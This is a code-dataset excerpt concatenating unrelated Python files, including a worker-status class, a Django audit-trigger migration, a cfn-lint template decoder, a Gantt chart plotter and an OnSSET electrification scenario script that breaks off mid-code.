id
stringlengths 2
8
| text
stringlengths 16
264k
| dataset_id
stringclasses 1
value |
---|---|---|
3298701
|
from datetime import datetime, timedelta
from enum import Enum, auto
STATUS_MESSAGE_TIMEOUT = timedelta(seconds=5)
class WorkerState(Enum):
"""
The state of a worker (i.e. a file-writer instance).
"""
IDLE = auto()
WRITING = auto()
UNKNOWN = auto()
UNAVAILABLE = auto()
class WorkerStatus(object):
"""
Contains general status information about a worker.
"""
def __init__(self, service_id: str):
self._last_update = datetime.now()
self._service_id = service_id
self._state = WorkerState.UNAVAILABLE
def __eq__(self, other_status: "WorkerStatus") -> bool:
if not isinstance(other_status, WorkerStatus):
raise NotImplementedError
return (
self.service_id == other_status.service_id
and self.state == other_status.state
)
def update_status(self, new_status: "WorkerStatus"):
"""
Updates the status/state of this instance of the WorkerStatus class using another instance.
.. note:: The service identifier of both this instance and the other one must be identical.
:param new_status: The other instance of the WorkerStatus class.
"""
if new_status.service_id != self.service_id:
raise RuntimeError(
f"Service id of status update is not correct ({self.service_id} vs {new_status.service_id})"
)
self._state = new_status.state
self._last_update = new_status.last_update
def check_if_outdated(self, current_time: datetime):
"""
Given the current time, state and the time of the last update: Have we lost the connection?
:param current_time: The current time
"""
if (
self.state != WorkerState.UNAVAILABLE
and current_time - self.last_update > STATUS_MESSAGE_TIMEOUT
):
self._state = WorkerState.UNAVAILABLE
self._last_update = current_time
@property
def state(self) -> WorkerState:
"""
The current state of the worker.
"""
return self._state
@property
def service_id(self) -> str:
"""
The service identifier of the worker that this instance of the WorkerState class represent.
"""
return self._service_id
@property
def last_update(self) -> datetime:
"""
The local time stamp of the last update of the status of the file-writer instance that this instance of the
WorkerStatus class represents.
"""
return self._last_update
@state.setter
def state(self, new_state: WorkerState):
self._last_update = datetime.now()
self._state = new_state
|
StarcoderdataPython
|
6453467
|
<filename>Vertical Sticks.py
# -*- coding: utf-8 -*-
"""
Problem Statement
Given an array of integers Y=[y1,y2,…,yn], we have n line segments, such that, the endpoints of ith segment are (i,0)
and (i,yi). Imagine that from the top of each segment a horizontal ray is shot to the left, and this ray stops when it
touches another segment or it hits the y-axis. We construct an array of n integers, [v1,v2,…,vn], where vi is equal to
length of ray shot from the top of segment i. We define V(y1,y2,…,yn)=v1+v2+…+vn.
For example, if we have Y=[3,2,5,3,3,4,1,2], then v1,v2,…,v8=[1,1,3,1,1,3,1,2], as shown in the picture below:
For each permutation p of [1,2,…,n], we can calculate V(yp1,yp2,…,ypn). If we choose a uniformly random permutation p of
[1,2,…,n], what is the expected value of V(yp1,yp2,…,ypn)?
"""
__author__ = 'Danyang'
class Solution(object):
def solve(self, cipher):
"""
approach this problem by independently calculating the expected value of vi for each stick
http://cs.stackexchange.com/questions/1076/how-to-approach-vertical-sticks-challenge
Start with a round table with n seats and k people and seat them at random. Distances between individuals
are obviously i.i.d. with mean n/k.
Now straighten the table to line, k+1 lines (including the y-axis), and the virtual circle of the line is (n+1)
Complexity: O(N^2)
:param cipher: the cipher
"""
N, A = cipher
l = N + 1
E = 0
for cur in A:
k = 0
for a in A:
if a >= cur:
k += 1 # including itself
E += float(l) / (k + 1)
return "%.2f" % E
if __name__ == "__main__":
import sys
f = open("0.in", "r")
# f = sys.stdin
solution = Solution()
testcases = int(f.readline().strip())
for t in xrange(testcases):
# construct cipher
N = int(f.readline().strip())
A = map(int, f.readline().strip().split(' '))
cipher = N, A
# solve
s = "%s\n" % (solution.solve(cipher))
print s,
|
StarcoderdataPython
|
11202781
|
"""Module for running PyVVO. This module is run by the platform (see
platform_config.json). The program expects two arguments: simulation ID
and simulation request.
Relevant documentation from GridAPPS-D can be found `here
<https://gridappsd.readthedocs.io/en/latest/using_gridappsd/index.html#id7>`__.
Since the link I gave you will almost definitely break or be wrong at
some point, it's under "Using GridAPPS-D"/"Hosting Application" on the
GridAPPS-D `Read the Docs site
<https://gridappsd.readthedocs.io/en/latest/index.html>`__
"""
import argparse
try:
import simplejson as json
except ModuleNotFoundError:
import json
import logging
from pyvvo import app
# Setup log.
LOG = logging.getLogger(__name__)
def _main():
# Log and collect inputs.
LOG.info("Starting PyVVO.")
parser = argparse.ArgumentParser()
parser.add_argument("sim_id", help="Simulation ID")
parser.add_argument("request", help="Simulation request")
opts = parser.parse_args()
# Parse the simulation request. Not sure why the .replace is
# needed, but it was done that way in the sample application.
sim_request = json.loads(opts.request.replace("\'", ""))
LOG.info("Simulation ID and request received. Initializing application.")
app.main(sim_id=opts.sim_id, sim_request=sim_request)
if __name__ == '__main__':
_main()
|
StarcoderdataPython
|
12841390
|
from typing import Type
from django.db.migrations.operations.base import Operation
from django.db.models import Model
class AddAuditOperation(Operation):
reduces_to_sql = True
reversible = True
enabled = True
def __init__(self, model_name, audit_rows=True, audit_text=False, excluded=('created', 'modified')):
self._model_name = model_name
self._audit_text = audit_text
self._audit_rows = audit_rows
self._excluded = excluded
def state_forwards(self, app_label, state):
pass # no visible changes for Django schema
def database_forwards(
self, app_label, schema_editor, from_state, to_state,
):
model: Type[Model] = to_state.apps.get_model(app_label, self._model_name)
table = model._meta.db_table
with schema_editor.connection.cursor() as cursor:
cursor.execute('SELECT to_regclass(\'audit.logged_actions\')')
has_audit = cursor.fetchone()[0]
BOOLEANS = ("BOOLEAN 'f'", "BOOLEAN 't'")
if has_audit:
schema_editor.execute(
'SELECT audit.audit_table({})'.format(
', '.join(( # join parameters
f"'public.{table}'",
BOOLEANS[self._audit_rows],
BOOLEANS[self._audit_text],
"'{{ {} }}'".format(
','.join(map( # join as postgres array
lambda col: f'"{col}"',
map( # extract column names from field names
lambda f: model._meta.get_field(f).get_attname_column()[1],
self._excluded,
)
))
)
))
),
)
def database_backwards(
self, app_label, schema_editor, from_state, to_state,
):
model = to_state.apps.get_model(app_label, self._model_name)
table = model._meta.db_table
schema_editor.execute(
'DROP TRIGGER IF EXISTS audit_trigger_row ON {}'.format(table),
)
schema_editor.execute(
'DROP TRIGGER IF EXISTS audit_trigger_stm ON {}'.format(table),
)
def describe(self):
return 'Add audit triggers on model {}'.format(self._model_name)
class RemoveAuditOperation(AddAuditOperation):
enabled = False
def database_forwards(
self, app_label, schema_editor, from_state, to_state,
):
super().database_backwards(
app_label, schema_editor, from_state, to_state,
)
def database_backwards(
self, app_label, schema_editor, from_state, to_state,
):
super().database_forwards(
app_label, schema_editor, from_state, to_state,
)
def describe(self):
return 'Remove audit triggers on model {}'.format(self._model_name)
EnableAuditOperation = AddAuditOperation
DisableAuditOperation = RemoveAuditOperation
|
StarcoderdataPython
|
233677
|
<gh_stars>1-10
# ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
# Copyright 2021- QuOCS Team
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
from qtpy import QtWidgets
from quocspyside2interface.logic.OptimalAlgorithmDictionaries.NewPythonArgumentDictionary import NewPythonArgumentDictionary
from quocspyside2interface.gui.uiclasses.NewPythonArgumentUI import Ui_Form
class NewPythonArgument(QtWidgets.QWidget, Ui_Form):
"""Create the new python argument for the python script"""
def __init__(self, argument_index, parent=None, argument=None):
# Get the path to the *.ui file
# ui_file = os.path.join(os.getcwd(), GuiConstants.GUI_PATH, "NewPythonArgument.ui")
# Load it
super().__init__(parent)
# uic.loadUi(ui_file, self)
self.setupUi(self)
# Argument index
self.argument_index_name = str(argument_index)
# Dictionary
self.new_python_argument_dictionary = NewPythonArgumentDictionary(loaded_dictionary=argument)
# Connection
self.argument_name_edit_line.textChanged.connect(self.set_argument_name)
self.argument_type_combobox.currentIndexChanged.connect(self.set_argument_type)
self.argument_value_edit_line.textChanged.connect(self.set_argument_value)
# Initialization
self._initialization()
def set_argument_name(self, argument_name):
self.new_python_argument_dictionary.name = argument_name
def set_argument_value(self, argument_value):
self.new_python_argument_dictionary.value = argument_value
def set_argument_type(self, index):
self.new_python_argument_dictionary.type = self.argument_type_combobox.itemText(index)
def _initialization(self):
# Combobox initialization
type_list = ["string", "int", "float", "bool"]
for type_name in type_list:
self.argument_type_combobox.addItem(type_name)
self.argument_name_edit_line.setText(self.new_python_argument_dictionary.name)
self.argument_type_combobox.itemText(type_list.index(self.new_python_argument_dictionary.type))
self.argument_value_edit_line.setText(self.new_python_argument_dictionary.value)
def get_dictionary(self):
return self.new_python_argument_dictionary.get_dictionary()
|
StarcoderdataPython
|
5029845
|
"""
Copyright 2019 Amazon.com, Inc. or its affiliates. All Rights Reserved.
SPDX-License-Identifier: MIT-0
"""
import sys
import logging
import six
try:
from json.decoder import JSONDecodeError
except ImportError:
JSONDecodeError = ValueError
from yaml.parser import ParserError, ScannerError
from yaml import YAMLError
from cfnlint.decode import cfn_yaml, cfn_json
from cfnlint.rules import Match, ParseError
LOGGER = logging.getLogger(__name__)
def decode(filename, ignore_bad_template):
"""
Decode filename into an object
"""
template = None
matches = []
try:
template = cfn_yaml.load(filename)
except IOError as e:
if e.errno == 2:
LOGGER.error('Template file not found: %s', filename)
matches.append(create_match_file_error(
filename, 'Template file not found: %s' % filename))
elif e.errno == 21:
LOGGER.error('Template references a directory, not a file: %s',
filename)
matches.append(create_match_file_error(
filename,
'Template references a directory, not a file: %s' % filename))
elif e.errno == 13:
LOGGER.error('Permission denied when accessing template file: %s',
filename)
matches.append(create_match_file_error(
filename,
'Permission denied when accessing template file: %s' % filename))
if matches:
return(None, matches)
except UnicodeDecodeError as err:
LOGGER.error('Cannot read file contents: %s', filename)
matches.append(create_match_file_error(
filename, 'Cannot read file contents: %s' % filename))
except cfn_yaml.CfnParseError as err:
err.match.Filename = filename
matches = [err.match]
except ParserError as err:
matches = [create_match_yaml_parser_error(err, filename)]
except ScannerError as err:
if err.problem in [
'found character \'\\t\' that cannot start any token',
'found unknown escape character']:
try:
template = cfn_json.load(filename)
except cfn_json.JSONDecodeError as json_err:
json_err.match.filename = filename
matches = [json_err.match]
except JSONDecodeError as json_err:
if hasattr(json_err, 'message'):
if json_err.message == 'No JSON object could be decoded': # pylint: disable=no-member
matches = [create_match_yaml_parser_error(err, filename)]
else:
matches = [create_match_json_parser_error(json_err, filename)]
if hasattr(json_err, 'msg'):
if json_err.msg == 'Expecting value': # pylint: disable=no-member
matches = [create_match_yaml_parser_error(err, filename)]
else:
matches = [create_match_json_parser_error(json_err, filename)]
except Exception as json_err: # pylint: disable=W0703
if ignore_bad_template:
LOGGER.info('Template %s is malformed: %s',
filename, err.problem)
LOGGER.info('Tried to parse %s as JSON but got error: %s',
filename, str(json_err))
else:
LOGGER.error(
'Template %s is malformed: %s', filename, err.problem)
LOGGER.error('Tried to parse %s as JSON but got error: %s',
filename, str(json_err))
return (None, [create_match_file_error(
filename,
'Tried to parse %s as JSON but got error: %s' % (
filename, str(json_err)))])
else:
matches = [create_match_yaml_parser_error(err, filename)]
except YAMLError as err:
matches = [create_match_file_error(filename, err)]
if not isinstance(template, dict) and not matches:
# Template isn't a dict which means nearly nothing will work
matches = [Match(1, 1, 1, 1, filename, ParseError(),
message='Template needs to be an object.')]
return (template, matches)
def create_match_yaml_parser_error(parser_error, filename):
"""Create a Match for a parser error"""
lineno = parser_error.problem_mark.line + 1
colno = parser_error.problem_mark.column + 1
msg = parser_error.problem
return Match(
lineno, colno, lineno, colno + 1, filename,
ParseError(), message=msg)
def create_match_file_error(filename, msg):
"""Create a Match for a parser error"""
return Match(
linenumber=1, columnnumber=1, linenumberend=1, columnnumberend=2,
filename=filename, rule=ParseError(), message=msg)
def create_match_json_parser_error(parser_error, filename):
"""Create a Match for a parser error"""
if sys.version_info[0] == 3:
lineno = parser_error.lineno
colno = parser_error.colno
msg = parser_error.msg
elif sys.version_info[0] == 2:
lineno = 1
colno = 1
msg = parser_error.message
return Match(
lineno, colno, lineno, colno + 1, filename, ParseError(), message=msg)
|
StarcoderdataPython
|
371817
|
import cpg_scpi
from time import sleep
def main():
cpg = cpg_scpi.CircuitPlayground()
cpg.test_ledDemo()
# cpg.test_led()
# value = cpg.acc()
# print(f'acc: {value}')
# value = cpg.light()
# print(f'light: {value}')
cpg.close()
print()
print(f'Closed connection to CPG. {cpg.is_open=}')
main()
|
StarcoderdataPython
|
5160669
|
<reponame>mvinyard/python-developer-kit
__module_name__ = "_dynamical_import_of_function_from_string.py"
__author__ = ", ".join(["<NAME>"])
__email__ = ", ".join(["<EMAIL>",])
# import packages #
# --------------- #
from importlib import import_module
def _dynamical_import_of_function_from_string(
package, module, function, function_parameters=None
):
"""
Import a specific function from an installed package, dynamically using a string.
Parmeters:
----------
package
Name of the package
type: str
module
Name of the module in the package
type: str
function
Name of the function in the module within the package
type: str
function_parameters
Default: None
Returns:
--------
function <package.module.function>
Notes:
------
(1)
"""
package_module = ".".join([package, module])
module = import_module(name=package_module)
try:
# some functions need parameters; others require not having parameters
function = getattr(module, function)
except:
function = getattr(module, function)(function_parameters)
return function
|
StarcoderdataPython
|
396917
|
# Copyright (c) 2013 Mirantis Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import contextlib
import itertools
import json
import mock
from oslo_utils import uuidutils
import six
import testtools
from stackalytics.dashboard import web
from stackalytics.processor import runtime_storage
class TestAPI(testtools.TestCase):
def setUp(self):
super(TestAPI, self).setUp()
self.app = web.app.test_client()
@contextlib.contextmanager
def make_runtime_storage(data, *generators):
_add_generated_records(data, *generators)
runtime_storage_inst = TestStorage(data)
setattr(web.app, 'stackalytics_vault', None)
with mock.patch('stackalytics.processor.runtime_storage.'
'get_runtime_storage') as get_runtime_storage_mock:
get_runtime_storage_mock.return_value = runtime_storage_inst
try:
yield runtime_storage_inst
finally:
pass
def make_records(**kwargs):
GENERATORS = {
'commit': _generate_commits,
'mark': _generate_marks,
'review': _generate_review,
}
def generate_records():
for record_type in kwargs.get('record_type', []):
if record_type in GENERATORS.keys():
for values in algebraic_product(**kwargs):
record = next(GENERATORS[record_type]())
record.update(values)
yield record
return generate_records
def make_module(module_name):
return {'id': module_name,
'module_group_name': module_name,
'modules': [module_name],
'tag': 'module'}
class TestStorage(runtime_storage.RuntimeStorage):
def __init__(self, data):
super(TestStorage, self).__init__('test://')
self.data = data
def get_update(self, pid):
for record in self.get_all_records():
yield record
def get_by_key(self, key):
return self.data.get(key)
def set_by_key(self, key, value):
super(TestStorage, self).set_by_key(key, value)
def get_all_records(self):
for n in range(self.get_by_key('record:count') or 0):
record = self.get_by_key('record:%s' % n)
if record:
yield record
def _generate_commits():
commit = {
'commit_id': uuidutils.generate_uuid(),
'lines_added': 9, 'module': 'nova', 'record_type': 'commit',
'message': 'Closes bug 1212953\n\nChange-Id: '
'I33f0f37b6460dc494abf2520dc109c9893ace9e6\n',
'subject': 'Fixed affiliation of Edgar and Sumit', 'loc': 10,
'user_id': 'john_doe',
'primary_key': uuidutils.generate_uuid(),
'author_email': '<EMAIL>', 'company_name': 'IBM',
'lines_deleted': 1, 'week': 2275,
'blueprint_id': None, 'bug_id': u'1212953',
'files_changed': 1, 'author_name': u'<NAME>',
'date': 1376737923, 'launchpad_id': u'john_doe',
'branches': set([u'master']),
'change_id': u'I33f0f37b6460dc494abf2520dc109c9893ace9e6',
'release': u'icehouse'
}
yield commit
def _generate_marks():
mark = {
'launchpad_id': 'john_doe', 'week': 2294, 'user_id': 'john_doe',
'description': 'Approved', 'author_name': '<NAME>',
'author_email': '<EMAIL>',
'primary_key': uuidutils.generate_uuid() + 'Workflow',
'module': 'glance', 'patch': 2, 'record_type': 'mark',
'company_name': '*independent', 'branch': 'master',
'date': 1387860458, 'record_id': 37184, 'release': 'icehouse',
'value': 1, 'type': 'Workflow',
'review_id': uuidutils.generate_uuid()}
yield mark
def _generate_review():
yield {
'status': 'NEW', 'review_number': 6, 'number': '60721',
'module': 'glance', 'topic': 'bug/1258999', 'record_type': 'review',
'value': -2, 'open': True,
'id': uuidutils.generate_uuid(),
'subject': 'Adding missing copy_from policy from policy.json',
'user_id': 'john_doe',
'primary_key': '<KEY>',
'author_email': '<EMAIL>', 'company_name': '*independent',
'branch': 'master',
'launchpad_id': 'john_doe', 'lastUpdated': 1387865203,
'author_name': '<NAME>', 'date': 1386547707,
'url': 'https://review.openstack.org/60721',
'sortKey': '0029f92e0000ed31', 'project': 'openstack/glance',
'week': 2292, 'release': 'icehouse', 'updated_on': 1387865147
}
def _add_generated_records(data, *generators):
count = 0
for gen in generators:
for record in gen():
record['record_id'] = count
data['record:%s' % count] = record
count += 1
data['record:count'] = count
def algebraic_product(**kwargs):
position_to_key = {}
values = []
for key, value in six.iteritems(kwargs):
position_to_key[len(values)] = key
values.append(value)
for chain in itertools.product(*values):
result = {}
for position, key in six.iteritems(position_to_key):
result[key] = chain[position]
yield result
def load_json(api_response):
return json.loads(api_response.data.decode('utf8'))
|
StarcoderdataPython
|
11218810
|
<gh_stars>1-10
from output.models.ms_data.identity_constraint.id_z006_xsd.id_z006 import (
AType,
BType,
BsType,
CType,
CsType,
RType,
Root,
)
__all__ = [
"AType",
"BType",
"BsType",
"CType",
"CsType",
"RType",
"Root",
]
|
StarcoderdataPython
|
9639700
|
import os
import platform
from distutils.core import setup, Extension
virtualenv_path = os.environ.get('VIRTUAL_ENV')
include_dirs = filter(None, [os.environ.get('INCLUDE_DIRS')])
library_dirs = filter(None, [os.environ.get('LIBRARY_DIRS')])
if virtualenv_path:
include_dirs.append('%s/include' % virtualenv_path)
library_dirs.append('%s/lib' % virtualenv_path)
ld_lib_key = ('DYLD_LIBRARY_PATH' if platform.platform() == 'Darwin'
else 'LD_LIBRARY_PATH')
os.environ[ld_lib_key] = '%s/lib' % virtualenv_path
mod_http_head = Extension(
'mod_http_head', sources=['mod_http_head.c'],
include_dirs=include_dirs,
library_dirs=library_dirs,
)
setup(name='mod_http_head', version='1.0',
description='A demo package http_head greenified',
ext_modules=[mod_http_head])
|
StarcoderdataPython
|
87498
|
<filename>projects/es.um.unosql.subtypes/python/src/charts/GanttChart.py
import numpy as np
import matplotlib.pyplot as pyplot
import matplotlib.font_manager as font_manager
from matplotlib.dates import WEEKLY,MONTHLY, DateFormatter, rrulewrapper, RRuleLocator
from .ChartData import ChartData
class GanttChart:
__chartData = None
def __init__(self, csvRoute):
self.__chartData = {}
try:
csvContent = open(csvRoute).readlines()[1:]
except IOError as ioerr:
print(ioerr)
entityDict = {}
for line in csvContent:
entityName, varId, count, firstTimestamp, lastTimestamp = line.rstrip().split(',')
if firstTimestamp != "0" and lastTimestamp != "0":
entityDict.setdefault(entityName,[]).append({"entityName": entityName, "varId": varId, "count": count, "firstTimestamp": firstTimestamp, "lastTimestamp": lastTimestamp})
for key in entityDict:
self.__chartData[key] = ChartData()
self.__chartData[key].process(entityDict[key])
def showCharts(self):
for key in self.__chartData:
self.__showChart(self.__chartData[key])
def __showChart(self, chartData):
figure1 = pyplot.figure()
ax = figure1.add_subplot(111)
for i in range(len(chartData.getYLabels())):
startDate, endDate = chartData.getTaskDates()[chartData.getYLabels()[i]]
ax.barh((i*0.5)+0.5, endDate - startDate, left=startDate, height=0.3, align='center', edgecolor='lightblue', color='blue', alpha = 1)
iLen = len(chartData.getYLabels())
pos = np.arange(0.5, iLen * 0.5 + 0.5, 0.5)
locsy, labelsy = pyplot.yticks(pos, chartData.getYLabels())
pyplot.setp(labelsy, fontsize = 8)
ax.set_ylim(bottom = -0.1, top = iLen*0.5+0.5)
ax.grid(color = 'lightblue', linestyle = ':')
ax.xaxis_date()
ax.xaxis.set_major_locator(RRuleLocator(rrulewrapper(MONTHLY, interval=4)))
ax.xaxis.set_major_formatter(DateFormatter("%d-%b-%Y"))
pyplot.setp(ax.get_xticklabels(), rotation=30, fontsize=8)
font = font_manager.FontProperties(size='small')
#ax.legend(loc=1,prop=font)
ax.invert_yaxis()
figure1.autofmt_xdate()
# Works only on Windows.
# pyplot.get_current_fig_manager().window.state('zoomed')
pyplot.show()
|
StarcoderdataPython
|
11364865
|
# Pulls all the other functions together to make magic!
#
# Author: <NAME> Last modified by <NAME>
# Date: 26 November 2018
# Python version: 3.7
import os
from onsset import *
import pandas as pd
import tkinter as tk
from tkinter import filedialog, messagebox
root = tk.Tk()
root.withdraw()
root.attributes("-topmost", True)
messagebox.showinfo('OnSSET', 'Open the specs file')
specs_path = filedialog.askopenfilename()
specs = pd.read_excel(specs_path, index_col=0)
countries = str(input('countries: ')).split()
countries = specs.index.tolist() if 'all' in countries else countries
choice = int(input('Enter 1 to split, 2 to prepare the inputs, 3 to run a scenario: '))
if choice == 1:
messagebox.showinfo('OnSSET', 'Open the csv file with GIS data')
settlements_csv = filedialog.askopenfilename()
messagebox.showinfo('OnSSET', 'Select the folder to save split countries')
base_dir = filedialog.asksaveasfilename()
print('\n --- Splitting --- \n')
df = pd.read_csv(settlements_csv)
for country in countries:
print(country)
df.loc[df[SET_COUNTRY] == country].to_csv(base_dir + '.csv', index=False)
elif choice == 2:
messagebox.showinfo('OnSSET', 'Open the file containing separated countries')
base_dir = filedialog.askopenfilename()
messagebox.showinfo('OnSSET', 'Browse to result folder and name the calibrated file')
output_dir = filedialog.asksaveasfilename()
print('\n --- Prepping --- \n')
for country in countries:
print(country)
settlements_in_csv = base_dir # os.path.join(base_dir, '{}.csv'.format(country))
settlements_out_csv = output_dir + '.csv' # os.path.join(output_dir, '{}.csv'.format(country))
onsseter = SettlementProcessor(settlements_in_csv)
onsseter.condition_df(country)
onsseter.grid_penalties()
onsseter.calc_wind_cfs()
pop_actual = specs.loc[country, SPE_POP]
pop_future = specs.loc[country, SPE_POP_FUTURE]
urban_current = specs.loc[country, SPE_URBAN]
urban_future = specs.loc[country, SPE_URBAN_FUTURE]
urban_cutoff = specs.loc[country, SPE_URBAN_CUTOFF]
start_year = int(specs.loc[country, SPE_START_YEAR])
end_year = int(specs.loc[country, SPE_END_YEAR])
time_step = int(specs.loc[country, SPE_TIMESTEP])
elec_actual = specs.loc[country, SPE_ELEC]
pop_cutoff = specs.loc[country, SPE_POP_CUTOFF1]
min_night_lights = specs.loc[country, SPE_MIN_NIGHT_LIGHTS]
max_grid_dist = specs.loc[country, SPE_MAX_GRID_DIST]
max_road_dist = specs.loc[country, SPE_MAX_ROAD_DIST]
pop_tot = specs.loc[country, SPE_POP]
pop_cutoff2 = specs.loc[country, SPE_POP_CUTOFF2]
dist_to_trans = specs.loc[country, SPE_DIST_TO_TRANS]
urban_cutoff, urban_modelled = onsseter.calibrate_pop_and_urban(pop_actual, pop_future, urban_current,
urban_future, urban_cutoff, start_year, end_year, time_step)
min_night_lights, dist_to_trans, max_grid_dist, max_road_dist, elec_modelled, pop_cutoff, pop_cutoff2, rural_elec_ratio, urban_elec_ratio = \
onsseter.elec_current_and_future(elec_actual, pop_cutoff, dist_to_trans, min_night_lights, max_grid_dist,
max_road_dist, pop_tot, pop_cutoff2, start_year)
onsseter.grid_reach_estimate(start_year, gridspeed=9999)
specs.loc[country, SPE_URBAN_MODELLED] = urban_modelled
specs.loc[country, SPE_URBAN_CUTOFF] = urban_cutoff
specs.loc[country, SPE_MIN_NIGHT_LIGHTS] = min_night_lights
specs.loc[country, SPE_MAX_GRID_DIST] = max_grid_dist
specs.loc[country, SPE_MAX_ROAD_DIST] = max_road_dist
specs.loc[country, SPE_ELEC_MODELLED] = elec_modelled
specs.loc[country, SPE_POP_CUTOFF1] = pop_cutoff
specs.loc[country, SPE_POP_CUTOFF2] = pop_cutoff2
specs.loc[country, 'rural_elec_ratio'] = rural_elec_ratio
specs.loc[country, 'urban_elec_ratio'] = urban_elec_ratio
try:
specs.to_excel(specs_path)
except ValueError:
specs.to_excel(specs_path + '.xlsx')
onsseter.df.to_csv(settlements_out_csv, index=False)
elif choice == 3:
# wb_tiers_all = {1: 7.738, 2: 43.8, 3: 160.6, 4: 423.4, 5: 598.6}
# print("""\nWorld Bank Tiers of Electricity Access
# 1: {} kWh/person/year
# 2: {} kWh/person/year
# 3: {} kWh/person/year
# 4: {} kWh/person/year
# 5: {} kWh/person/year""".format(wb_tiers_all[1], wb_tiers_all[2], wb_tiers_all[3],
# wb_tiers_all[4], wb_tiers_all[5]))
# wb_tier_urban = int(input('Enter the tier number for urban: '))
# wb_tier_rural = int(input('Enter the tier number for rural: '))
diesel_high = True if 'y' in input('Use high diesel value? <y/n> ') else False
diesel_tag = 'high' if diesel_high else 'low'
#do_combine = True if 'y' in input('Combine countries into a single file? <y/n> ') else False
messagebox.showinfo('OnSSET', 'Open the csv file with calibrated GIS data')
base_dir = filedialog.askopenfilename()
messagebox.showinfo('OnSSET', 'Browse to result folder and name the scenario to save outputs')
output_dir = filedialog.asksaveasfilename()
print('\n --- Running scenario --- \n')
for country in countries:
# create country_specs here
print(' --- {} --- {} --- '.format(country, diesel_tag))
settlements_in_csv = base_dir # os.path.join(base_dir, '{}.csv'.format(country))
settlements_out_csv = output_dir + '.csv' # os.path.join(output_dir, '{}_{}_{}.csv'.format(country, wb_tier_urban, diesel_tag))
summary_csv = output_dir + 'summary.csv'
onsseter = SettlementProcessor(settlements_in_csv)
start_year = specs[SPE_START_YEAR][country]
end_year = specs[SPE_END_YEAR][country]
time_step = specs[SPE_TIMESTEP][country]
diesel_price = specs[SPE_DIESEL_PRICE_HIGH][country] if diesel_high else specs[SPE_DIESEL_PRICE_LOW][country]
grid_price = specs[SPE_GRID_PRICE][country]
existing_grid_cost_ratio = specs[SPE_EXISTING_GRID_COST_RATIO][country]
num_people_per_hh_rural = float(specs[SPE_NUM_PEOPLE_PER_HH_RURAL][country])
num_people_per_hh_urban = float(specs[SPE_NUM_PEOPLE_PER_HH_URBAN][country])
max_grid_extension_dist = float(specs[SPE_MAX_GRID_EXTENSION_DIST][country])
urban_elec_ratio = float(specs['rural_elec_ratio'][country])
rural_elec_ratio = float(specs['urban_elec_ratio'][country])
# energy_per_pp_rural = wb_tiers_all[wb_tier_rural]
# energy_per_pp_urban = wb_tiers_all[wb_tier_urban]
mg_pv_cap_cost = specs.loc[country, SPE_CAP_COST_MG_PV]
grid_cap_gen_limit = specs.loc[country, 'NewGridGenerationCapacityTimestepLimit']
#eleclimit = specs[SPE_ELEC_LIMIT][country]
#investlimit = specs[SPE_INVEST_LIMIT][country]
#step_year = start_year + time_step
Technology.set_default_values(base_year=start_year,
start_year=start_year,
end_year=end_year,
discount_rate=0.12,
# grid_cell_area=1,
mv_line_cost=9000,
lv_line_cost=5000,
mv_line_capacity=50,
lv_line_capacity=10,
lv_line_max_length=30,
hv_line_cost=120000,
mv_line_max_length=50,
hv_lv_transformer_cost=3500,
mv_increase_rate=0.1)
grid_calc = Technology(om_of_td_lines=0.03,
distribution_losses=float(specs[SPE_GRID_LOSSES][country]),
connection_cost_per_hh=122,
base_to_peak_load_ratio=float(specs[SPE_BASE_TO_PEAK][country]),
capacity_factor=1,
tech_life=30,
grid_capacity_investment=float(specs[SPE_GRID_CAPACITY_INVESTMENT][country]),
grid_penalty_ratio=1,
grid_price=grid_price)
mg_hydro_calc = Technology(om_of_td_lines=0.03,
distribution_losses=0.05,
connection_cost_per_hh=100,
base_to_peak_load_ratio=1,
capacity_factor=0.5,
tech_life=30,
capital_cost=2500,
om_costs=0.02)
mg_wind_calc = Technology(om_of_td_lines=0.03,
distribution_losses=0.05,
connection_cost_per_hh=100,
base_to_peak_load_ratio=0.9,
capital_cost=2300,
om_costs=0.035,
tech_life=20)
mg_pv_calc = Technology(om_of_td_lines=0.03,
distribution_losses=0.05,
connection_cost_per_hh=100,
base_to_peak_load_ratio=0.9,
tech_life=20,
om_costs=0.018,
capital_cost=mg_pv_cap_cost)
sa_pv_calc = Technology(base_to_peak_load_ratio=0.9,
tech_life=15,
om_costs=0.018,
capital_cost=5500,
standalone=True)
mg_diesel_calc = Technology(om_of_td_lines=0.03,
distribution_losses=0.05,
connection_cost_per_hh=100,
base_to_peak_load_ratio=0.5,
capacity_factor=0.7,
tech_life=15,
om_costs=0.1,
efficiency=0.33,
capital_cost=1200,
diesel_price=diesel_price,
diesel_truck_consumption=33.7,
diesel_truck_volume=15000)
sa_diesel_calc = Technology(base_to_peak_load_ratio=0.5,
capacity_factor=0.7,
tech_life=10,
om_costs=0.1,
capital_cost=2000,
diesel_price=diesel_price,
standalone=True,
efficiency=0.28,
diesel_truck_consumption=14,
diesel_truck_volume=300)
# Used to identify the steps and include them in the results
# ### FIRST RUN - NO TIMESTEP
#
#
# time_step = 12
# year = 2030
# eleclimits = {2030: 1}
#
# # eleclimit = float(input('Provide the targeted electrification rate in {}:'.format(year)))
# eleclimit = eleclimits[year]
# # investlimit = int(input('Provide the targeted investment limit (in USD) for the year {}:'.format(year)))
#
# onsseter.set_scenario_variables(year, num_people_per_hh_rural, num_people_per_hh_urban, time_step, start_year,
# urban_elec_ratio, rural_elec_ratio)
#
#
# onsseter.calculate_off_grid_lcoes(mg_hydro_calc, mg_wind_calc, mg_pv_calc, sa_pv_calc, mg_diesel_calc,
# sa_diesel_calc, year, start_year, end_year, time_step)
#
# onsseter.pre_electrification(grid_calc, grid_price, year, time_step, start_year)
#
